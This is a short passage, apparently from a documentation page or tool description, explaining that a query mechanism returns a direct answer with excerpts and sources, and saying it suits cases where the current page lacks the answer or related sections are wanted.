will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.